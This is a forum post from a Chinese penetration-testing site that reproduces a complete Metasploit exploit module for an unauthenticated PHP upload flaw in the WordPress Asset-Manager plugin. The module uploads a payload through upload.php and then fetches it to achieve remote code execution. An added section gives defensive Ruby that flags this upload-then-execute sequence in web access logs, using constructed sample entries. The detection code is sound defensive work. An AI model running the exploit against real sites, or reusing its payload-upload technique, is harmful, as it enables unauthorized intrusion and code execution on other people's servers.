中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: WordPress Asset-Manager PHP File Upload Vulnerability

Author: admin    Time: 2012-12-31 09:22

This Metasploit module exploits a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. It allows PHP file upload: a user can upload a file to a temp directory without authentication, which results in arbitrary code execution.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    # Random .php name so repeated runs do not collide in the temp directory
    payload_name = "#{rand_text_alpha(5)}.php"
    # PHP stub that writes and runs the selected payload, then deletes itself
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # upload.php expects a multipart form field named "Filedata"
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # A successful upload echoes the stored file name back in the response body
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The plugin stores uploads under a web-reachable temp directory, so a
    # plain GET of the file executes it
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
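The module above leaves a distinctive two-request footprint: an unauthenticated POST to the plugin's upload.php, then a GET of a freshly named .php file under wp-content/uploads/assets/temp/. The following Ruby is an added example, not part of the original post or of the Metasploit module, that correlates those two requests per client IP in combined-format web server access logs. The log lines, IP addresses and the 300-second correlation window are constructed for the demonstration; only the two URL paths come from the module itself.

```ruby
# Added example (not from the original post or the Metasploit module):
# detect the Asset-Manager upload-then-execute sequence in access logs.
require 'time'

# The two paths the module requests, anywhere under the WordPress base URI.
UPLOAD_RE = %r{\APOST (?<path>\S*?/wp-content/plugins/asset-manager/upload\.php)(?:\?\S*)? HTTP/}
EXEC_RE   = %r{\AGET (?<path>\S*?/wp-content/uploads/assets/temp/[^/\s]+\.php)(?:\?\S*)? HTTP/}

# Apache/nginx "combined" log format: ip ident user [time] "request" status size ...
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<req>[^"]*)" (?<status>\d{3}) \S+/

# Parses one combined-format line into a hash; returns nil for lines that
# do not match so callers can skip malformed or foreign entries.
def parse_line(line)
  m = LOG_RE.match(line) or return nil
  {
    ip:      m[:ip],
    time:    Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
    request: m[:req],
    status:  m[:status].to_i
  }
end

# Returns one alert per (client IP, .php fetch) where the same IP had a
# successful (HTTP 200) POST to upload.php within `window` seconds before.
# The 200 on the upload mirrors the module's own success check; the GET is
# reported whatever its status, since a 500 still means the file executed.
def find_asset_manager_uploads(lines, window: 300)
  uploads = Hash.new { |h, k| h[k] = [] }   # ip => [upload times]
  alerts  = []
  lines.each do |line|
    entry = parse_line(line) or next
    if UPLOAD_RE.match?(entry[:request]) && entry[:status] == 200
      uploads[entry[:ip]] << entry[:time]
    elsif (m = EXEC_RE.match(entry[:request]))
      hit = uploads[entry[:ip]].find { |t| (entry[:time] - t).between?(0, window) }
      next unless hit
      alerts << { ip: entry[:ip], file: m[:path], uploaded_at: hit,
                  executed_at: entry[:time], status: entry[:status] }
    end
  end
  alerts
end

# Constructed sample log: one real-looking exploit sequence from 192.0.2.10,
# plus benign and failed traffic from 198.51.100.7 that must not alert.
SAMPLE_LOG = <<~LOG.lines.map(&:chomp)
  192.0.2.10 - - [31/Dec/2012:09:20:01 +0800] "GET /wordpress/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
  192.0.2.10 - - [31/Dec/2012:09:20:05 +0800] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 87 "-" "Mozilla/5.0"
  192.0.2.10 - - [31/Dec/2012:09:20:06 +0800] "GET /wordpress/wp-content/uploads/assets/temp/kQpLz.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  198.51.100.7 - - [31/Dec/2012:09:21:00 +0800] "GET /wordpress/wp-content/uploads/assets/temp/logo.png HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
  198.51.100.7 - - [31/Dec/2012:09:21:30 +0800] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 403 199 "-" "Mozilla/5.0"
  198.51.100.7 - - [31/Dec/2012:09:21:31 +0800] "GET /wordpress/wp-content/uploads/assets/temp/abcde.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"
LOG

if __FILE__ == $0
  find_asset_manager_uploads(SAMPLE_LOG).each do |a|
    puts "ALERT #{a[:ip]} uploaded at #{a[:uploaded_at]} and executed #{a[:file]} (HTTP #{a[:status]})"
  end
end
```

Feed real logs with `find_asset_manager_uploads(File.readlines('access.log'))`. The correlation is deliberately strict (same IP, 200 on the upload) to keep false positives down; a lone GET of a .php under the temp directory is still worth a lower-severity rule, since the plugin has no legitimate reason to serve PHP from there.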
Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2